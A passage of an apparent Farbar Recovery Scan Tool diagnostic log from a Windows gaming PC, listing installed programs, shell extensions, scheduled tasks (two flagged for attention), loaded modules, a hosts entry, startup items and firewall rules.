Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2721691) (HKLM-x32\...\{355B5AC0-CEEE-42C5-AD4D-7F3CFD806C36}) (Version: 4.30.2114.0 - Microsoft Corporation)
NARUTO SHIPPUDEN: Ultimate Ninja STORM 3 Full Burst (HKLM-x32\...\NARUTO SHIPPUDEN: Ultimate Ninja STORM 3 Full Burst_is1) (Version:  - Namco Bandai Games)
NBA 2K14 (HKLM-x32\...\{4FE0545A-1BF3-4B9B-A044-6E1EE719E197}) (Version: 1.0.0 - 2K Sports)
Need for Speed™ Most Wanted (HKLM-x32\...\{FB0127F3-985B-44CE-AE29-378CAF60B361}) (Version: 1.5.0.0 - Electronic Arts)
NEKOPARA Vol. 1 (HKLM-x32\...\TkVLT1BBUkFWb2wx_is1) (Version: 1 - )
NEKOPARA Vol. 2 (HKLM\...\bmVrb3BhcmF2b2wy_is1) (Version: 1 - )
NEKOPARA Vol.3 (HKLM\...\DARKSiDERS - NEKOPARA Vol.3) (Version:  - DARKSiDERS)
NetCut 2.1.4 (HKLM-x32\...\NetCut_is1) (Version:  - arcai.com)
NewBlue Titler Pro for Windows (HKLM-x32\...\NewBlue Titler Pro for Windows) (Version: 1.0 - NewBlue)
NewBlue Video Essentials for Windows (HKLM-x32\...\NewBlue Video Essentials for Windows) (Version: 3.0 - NewBlue)
NewBlue Video Essentials V for Windows (HKLM-x32\...\NewBlue Video Essentials V for Windows) (Version: 3.0 - NewBlue)
NewBlue Video Essentials VI for Windows (HKLM-x32\...\NewBlue Video Essentials VI for Windows) (Version: 3.0 - NewBlue)
NewBlue Video Essentials VII for Windows (HKLM-x32\...\NewBlue Video Essentials VII for Windows) (Version: 3.0 - NewBlue)
NVIDIA 3D Vision Driver 384.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 384.94 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.8.0.89 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.8.0.89 - NVIDIA Corporation)
NVIDIA Graphics Driver 384.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 384.94 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation)
NvvHci (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvvHci) (Version: 2.02.0.5 - NVIDIA Corporation) Hidden
OpenIV (HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\OpenIV) (Version: 2.9.907 - .black/OpenIV Team)
OpenVPN 2.3.12-I602  (HKLM-x32\...\OpenVPN) (Version: 2.3.12-I602 - )
Origin (HKLM-x32\...\Origin) (Version: 10.4.12.59996 - Electronic Arts, Inc.)
osu! (HKLM-x32\...\{7ffcd5ea-283b-4abf-872c-28f24ee6a8c8}) (Version: latest - ppy Pty Ltd)
Outils de vérification linguistique 2016 de Microsoft Office - Français (HKLM\...\{90160000-001F-040C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Outlast (HKLM-x32\...\Outlast_is1) (Version:  - )
PowerISO (HKLM-x32\...\PowerISO) (Version: 6.6 - Power Software Ltd)
Pro Evolution Soccer 2013 (HKLM-x32\...\{C2523AE6-F335-4D0B-BC15-1C07E4ACE629}) (Version: 1.00.0000 - KONAMI)
proDAD Adorage 3.0 (64bit) (HKLM\...\proDAD-Adorage-3.0) (Version: 3.0.114.1 - proDAD GmbH)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.991 - Even Balance, Inc.)
Pure Chess Grandmaster Edition (HKLM-x32\...\Pure Chess Grandmaster Edition_is1) (Version:  - )
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 10.0.1.0 - Qualcomm Atheros)
QuickSet64 (HKLM\...\{87CF757E-C1F1-4D22-865C-00C6950B5258}) (Version: 11.1.31 - Dell Inc.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.10125.31214 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller All-In-One Windows Driver (HKLM-x32\...\{F7E7F0CB-AA41-4D5A-B6F2-8E6738EB063F}) (Version: 10.1.505.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7564 - Realtek Semiconductor Corp.)
RESIDENT EVIL 5 (HKLM-x32\...\{AC08BBA0-96B9-431A-A7D0-D8598E493775}) (Version: 1.0.0.129 - CAPCOM CO., LTD.)
Resident Evil 6 (HKLM-x32\...\Resident Evil 6_is1) (Version: Resident Evil 6 - )
Resident Evil Revelations 2 - Complete version 1.0.0 (HKLM-x32\...\Resident Evil Revelations 2 - Complete_is1) (Version: 1.0.0 - Capcom)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.1.5.8 - Rockstar Games)
Sades 7.1CH Gaming Headset (HKLM-x32\...\{71B53BA8-4BE3-49AF-BC3E-07F392006620}) (Version: 1.00.0019 - SHENZHEN SADES DIGITAL TECHNOLOGY CO.,LTD)
ScpToolkit (HKLM\...\{1EA84ED4-28D4-4836-BF8B-0E31BF1704C5}) (Version: 1.7.277.16103 - Nefarius Software Solutions)
SketchUp 2017 (HKLM\...\{BCA90A4C-9C6A-49D1-91F9-594A0BE02432}) (Version: 17.1.174 - Trimble, Inc.)
Skype™ 7.36 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.36.101 - Skype Technologies S.A.)
Sniper Ghost Warrior 2 (HKLM-x32\...\Sniper Ghost Warrior 2_is1) (Version:  - )
SpeedFan (remove only) (HKLM-x32\...\SpeedFan) (Version:  - )
Splinter Cell Conviction (HKLM-x32\...\Splinter Cell Conviction_R.G. Shift_is1) (Version:  - R.G. Shift, Galfimbul)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Steam Customizer (HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\Steam Customizer) (Version: 1.00.00.00 - Blumont)
TAP-Windows 9.21.2 (HKLM\...\TAP-Windows) (Version: 9.21.2 - )
TechPowerUp GPU-Z (HKLM-x32\...\TechPowerUp GPU-Z) (Version:  - TechPowerUp)
The Crew (Worldwide) (HKLM-x32\...\Uplay Install 413) (Version:  - Ubisoft)
The Walking Dead - Season 2 (HKLM-x32\...\The Walking Dead - Season 2_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
The Walking Dead (HKLM-x32\...\The Walking Dead_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, Panky)
This War of Mine (HKLM-x32\...\This War of Mine_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
Tom Clancy's Splinter Cell Conviction (HKLM-x32\...\{6D8DDB4A-C263-40DE-BA16-AFDAD159D59A}) (Version: 1.04.000 - Ubisoft)
Update for Skype for Business 2016 (KB3115087) 64-Bit Edition (HKLM\...\{90160000-0011-0000-1000-0000000FF1CE}_Office16.PROPLUS_{C48D0508-2A21-42EA-8BC9-D387768F54F4}) (Version:  - Microsoft)
Update for Skype for Business 2016 (KB3115087) 64-Bit Edition (HKLM\...\{90160000-00C1-0000-1000-0000000FF1CE}_Office16.PROPLUS_{C48D0508-2A21-42EA-8BC9-D387768F54F4}) (Version:  - Microsoft)
Update for Skype for Business 2016 (KB3115087) 64-Bit Edition (HKLM\...\{90160000-012B-0409-1000-0000000FF1CE}_Office16.PROPLUS_{C48D0508-2A21-42EA-8BC9-D387768F54F4}) (Version:  - Microsoft)
Uplay (HKLM-x32\...\Uplay) (Version: 2.0 - Ubisoft)
USB Game Controller (HKLM-x32\...\{95CC887F-91B2-45E9-AE29-0D51995192CB}) (Version: 2005.05.26 - )
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
Vulkan Run Time Libraries 1.0.42.1 (HKLM\...\VulkanRT1.0.42.1) (Version: 1.0.42.1 - LunarG, Inc.)
Walking Dead: A New Frontier (HKLM-x32\...\Walking Dead: A New Frontier_is1) (Version:  - )
Windows 10 Update and Privacy Settings (HKLM\...\{4DFCD818-036A-4229-A67D-CF17DC461D92}) (Version: 1.0.14.0 - Microsoft Corporation)
Windows 10 Update Assistant (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22243 - Microsoft Corporation)
Windows Driver Package - Dell Inc (DellRbtn) HIDClass  (05/04/2015 1.4.2) (HKLM\...\70CCEEBCDF8A7D01F9CCA083F90CBABE40EAC5EB) (Version: 05/04/2015 1.4.2 - Dell Inc)
WinPcap 4.1.3 (HKLM-x32\...\WinPcapInst) (Version: 4.1.0.2980 - Riverbed Technology, Inc.)
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
Wireshark 2.2.5 (64-bit) (HKLM-x32\...\Wireshark) (Version: 2.2.5 - The Wireshark developer community, hxxps://www.wireshark.org)
Wondershare MobileGo(Version 8.2.3) (HKLM-x32\...\{1E04C795-7359-4E05-8A0E-5644F777AA09}_is1) (Version: 8.2.3 - Wondershare)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2016-11-01] ()
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2016-11-01] ()
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2016-11-01] ()
ShellIconOverlayIdentifiers: [   IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2017-06-23] (Tonec Inc.)
ShellIconOverlayIdentifiers: [  GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2017-07-19] (Google)
ShellIconOverlayIdentifiers: [  GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2017-07-19] (Google)
ShellIconOverlayIdentifiers: [  GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2017-07-19] (Google)
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2016-11-01] ()
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2016-11-01] ()
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2016-11-01] ()
ContextMenuHandlers1: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files (x86)\Google\Drive\contextmenu64.dll [2017-07-19] (Google)
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2016-11-01] ()
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-15] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-15] (Alexander Roshal)
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2016-11-01] ()
ContextMenuHandlers4: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files (x86)\Google\Drive\contextmenu64.dll [2017-07-19] (Google)
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2016-11-01] ()
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\system32\igfxDTCM.dll [2016-11-07] (Intel Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2017-07-19] (NVIDIA Corporation)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-15] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-15] (Alexander Roshal)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {071F7B60-51EF-40B9-A497-F0113DA60282} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> No File <==== ATTENTION
Task: {236756A9-D7FC-4648-817E-F42BFDF69327} - System32\Tasks\UninstMiniWifi => C:\Users\AEZIAA~1\AppData\Local\Temp\MUBDC0.bat <==== ATTENTION
Task: {2CF1904A-F92A-4404-9B48-D7F4DF4BA7D0} - System32\Tasks\{F5F8BCC3-5972-4525-8741-F6E51B56A640} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\SQUARE ENIX\Final Fantasy XIII-2\FFXiii2Launcher.exe" -d "C:\Program Files (x86)\SQUARE ENIX\Final Fantasy XIII-2"
Task: {37795B9A-E9C2-4990-BE2E-AA30ACE60470} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-11-21] (Google Inc.)
Task: {3B3BF334-AB1E-4AD1-ACC7-40F67EF8E7F3} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [2015-07-31] (Microsoft Corporation)
Task: {436D0683-536A-45ED-90D2-BEDBFDEEAD04} - System32\Tasks\{72CA1D33-A59E-4B21-80C6-621E26795DA2} => C:\WINDOWS\system32\pcalua.exe -a "E:\Secret Games\NBA2K14\rld-nba2k14\setup.exe" -d "E:\Secret Games\NBA2K14\rld-nba2k14"
Task: {55F64744-2CA8-4E10-9165-44A26AE45F0F} - System32\Tasks\RtHDVBg_PushButton => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2015-07-23] (Realtek Semiconductor)
Task: {5F36212B-1521-45B3-94CA-882C23E804AF} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-07-27] (NVIDIA Corporation)
Task: {5FC48E09-38CC-4046-96B1-01FCD4DA84E1} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-07-27] (NVIDIA Corporation)
Task: {6CF749C9-7DEA-4E05-A476-89590EC80794} - System32\Tasks\Microsoft\Windows\rempl\shell => C:\Program Files\rempl\remsh.exe [2017-07-12] (Microsoft Corporation)
Task: {7067686B-B393-4DD3-A578-4BC84F8BFEE9} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-07-27] (NVIDIA Corporation)
Task: {7D7B41AF-1CD7-4F0E-8C87-90FD7EBEF4ED} - System32\Tasks\ScpUpdater => C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpUpdater.exe [2016-04-12] (Nefarius Software Solutions)
Task: {876ADB2F-302C-4575-A9D4-C932BB7ED81E} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-07-27] (NVIDIA Corporation)
Task: {A72280CF-8E3A-485C-9F7C-24278CEEF3C5} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-07-27] (NVIDIA Corporation)
Task: {AB0ACC87-66E2-498C-B6C5-51346A51598C} - System32\Tasks\Shutdown => C:\Windows\System32\shutdown.exe [2017-03-19] (Microsoft Corporation)
Task: {AD9E3FDE-8587-4684-8C55-990964B3F864} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [2017-07-27] (NVIDIA Corporation)
Task: {B1049EEB-C4C4-4878-8B07-F6AF1E4409E0} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-07-27] (NVIDIA Corporation)
Task: {BFDD085A-B9D8-49E0-B7B8-0BE1EE83F669} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-08-27] (Piriform Ltd)
Task: {C18E2C0E-4D43-4308-95EF-3BAE7E517C64} - System32\Tasks\Microsoft\Windows\rempl\shell-unlock => C:\Program Files\rempl\remsh.exe [2017-07-12] (Microsoft Corporation)
Task: {D4E80BC5-50F1-44B1-B992-804F194AC2A9} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-11-21] (Google Inc.)
Task: {F3BA7107-A730-40C9-A47B-25CD1A399833} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-07-27] (NVIDIA Corporation)
Task: {FC73A8C6-72ED-4595-9CA2-698FBE893184} - System32\Tasks\Baidu LiveUpdate => C:\Program [Argument = Files (x86)\Baidu WiFiHotspot\liveupdate.exe]
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\RunDFS.job => cmd /c sc start Dell Foundation ServicesWORKGROUP AEZIA
Task: C:\WINDOWS\Tasks\ScpUpdater.job => C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpUpdater.exe
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
 
==================== Loaded Modules (Whitelisted) ==============
 
2016-12-11 14:14 - 2017-05-25 20:59 - 000066872 _____ () C:\WINDOWS\SysWOW64\PnkBstrA.exe
2016-12-11 14:14 - 2017-05-25 21:00 - 000103736 _____ () C:\WINDOWS\SysWOW64\PnkBstrB.exe
2017-08-06 14:05 - 2017-07-27 00:09 - 001267136 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2016-11-01 02:45 - 2016-11-01 02:45 - 000592384 _____ () C:\ProgramData\MEGAsync\ShellExtX64.dll
2017-03-19 03:58 - 2017-03-19 03:58 - 000138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2017-03-19 03:59 - 2017-03-19 09:30 - 001731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-11-07 16:47 - 2016-11-07 16:47 - 000401920 _____ () C:\WINDOWS\system32\igfxTray.exe
2017-08-30 05:56 - 2017-08-23 15:48 - 003824472 _____ () C:\Program Files (x86)\Google\Chrome\Application\60.0.3112.113\libglesv2.dll
2017-08-30 05:56 - 2017-08-23 15:48 - 000100184 _____ () C:\Program Files (x86)\Google\Chrome\Application\60.0.3112.113\libegl.dll
2015-03-07 07:07 - 2015-03-07 07:07 - 000908568 _____ () C:\Program Files\Logitech Gaming Software\libGLESv2.dll
2016-08-30 07:17 - 2016-08-30 07:17 - 001096824 _____ () C:\Program Files\Logitech Gaming Software\platforms\qwindows.dll
2015-03-07 07:07 - 2015-03-07 07:07 - 000060184 _____ () C:\Program Files\Logitech Gaming Software\libEGL.dll
2016-08-30 07:17 - 2016-08-30 07:17 - 000241784 _____ () C:\Program Files\Logitech Gaming Software\imageformats\qjpeg.dll
2016-11-12 18:01 - 2014-11-10 10:52 - 002341376 ____N () C:\Program Files\Sades 7.1CH Gaming Headset\CPL\FaceLift_x64.exe
2016-01-06 23:41 - 2016-01-06 23:41 - 000062168 _____ () C:\Program Files\CCleaner\branding.dll
2016-11-23 15:44 - 2016-11-23 15:44 - 000166520 _____ () C:\Program Files (x86)\Hotspot Shield\bin\CrashRpt1403.dll
2015-06-24 01:07 - 2015-06-24 01:07 - 001243936 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
2017-08-06 14:05 - 2017-07-27 00:09 - 001040320 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxlctlfudivq`qsp`28hfm [0]
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2015-10-30 14:24 - 2016-12-17 21:56 - 000000853 _____ C:\WINDOWS\system32\Drivers\etc\hosts
 
127.0.0.1 cap.cyberlink.com
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Aezia Aznan\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppBackground\{7d1213e5-5eb6-440a-8279-40449e233bb1}.jpg
DNS Servers: 192.168.1.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
HKLM\...\StartupApproved\StartupFolder: => "MobileGo Service.lnk"
HKLM\...\StartupApproved\StartupFolder: => "ScpToolkit Tray Notifications.lnk"
HKLM\...\StartupApproved\Run32: => "PWRISOVM.EXE"
HKLM\...\StartupApproved\Run32: => "jswtrayutil"
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\StartupApproved\Run: => "IDMan"
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\StartupApproved\Run: => "uTorrent"
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\StartupApproved\Run: => "DriverAgent Plus"
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_47C3CADE9C76B60CAF4A436AF4AD6798"
HKU\S-1-5-21-3909864297-3729878400-1751894149-1001\...\StartupApproved\Run: => "Skype"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [{821C9047-C7A1-4C12-BB64-C012FC1FCB8D}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{56A454D2-84EC-4FFD-B433-B32E15393989}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{AA31711E-9076-4F79-86EF-41D09B7DD614}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{EC4A4964-A04A-4923-BED1-FF30DBC37529}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{65785D17-AD91-48A5-8C50-CAB08242D655}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{826FD03C-3F7E-4271-944F-E001242C4DBC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{D966B136-BB18-42B5-B5FF-A335446766F1}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{4C31D5F7-4617-4600-945C-796568A05803}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{DEAE704E-F18F-4E84-BEA8-938B642FDA9C}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{9F9C5572-AD42-40BB-8F27-3261E3E0027E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{8B85871A-3F65-4108-BC74-E9311038BE9D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{89248A83-16F3-4F9C-944C-124E7786D725}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{617DD04D-9F11-4912-8CBF-DF47E0FC4D54}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{DFD9C644-4E26-4AC9-835F-72784342D36A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [UDP Query User{2C8DF3A3-2B53-46E8-885A-A327D02E789D}C:\program files (x86)\wondershare\mobilego\mobilego.exe] => (Allow) C:\program files (x86)\wondershare\mobilego\mobilego.exe
FirewallRules: [TCP Query User{87BC19C6-A522-4C50-BC6F-C42EFC7F0581}C:\program files (x86)\wondershare\mobilego\mobilego.exe] => (Allow) C:\program files (x86)\wondershare\mobilego\mobilego.exe
FirewallRules: [{56D0C921-664C-4F5B-94C1-500EF1190BFF}] => (Allow) E:\Aezia's Game\SteamLibrary\steamapps\common\Mad Max\MadMax.exe
FirewallRules: [{8DA821B1-7A43-41EA-8AA3-41B4A7D78D17}] => (Allow) E:\Aezia's Game\SteamLibrary\steamapps\common\Mad Max\MadMax.exe
FirewallRules: [{A5EDBCF7-8A56-4C4C-9033-602DB8B46D74}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{25C8698D-C7DE-4BEF-9FA9-9A86566FE43E}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{6627EF12-B719-4512-A118-6D249F8EC7C1}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{201923CD-98DC-44D9-AE9D-9E5295109AF8}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{1E75D466-CEA5-47D2-8658-560F490A9915}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{67A800C1-7EB1-4D44-A1EE-50FE162E4280}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{991D0F57-1FA8-4E8F-9380-E7194DE16B68}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{FC45BCA2-DB52-45FA-81E3-5B93EBC179A7}] => (Allow) %systemroot%\system32\alg.exe
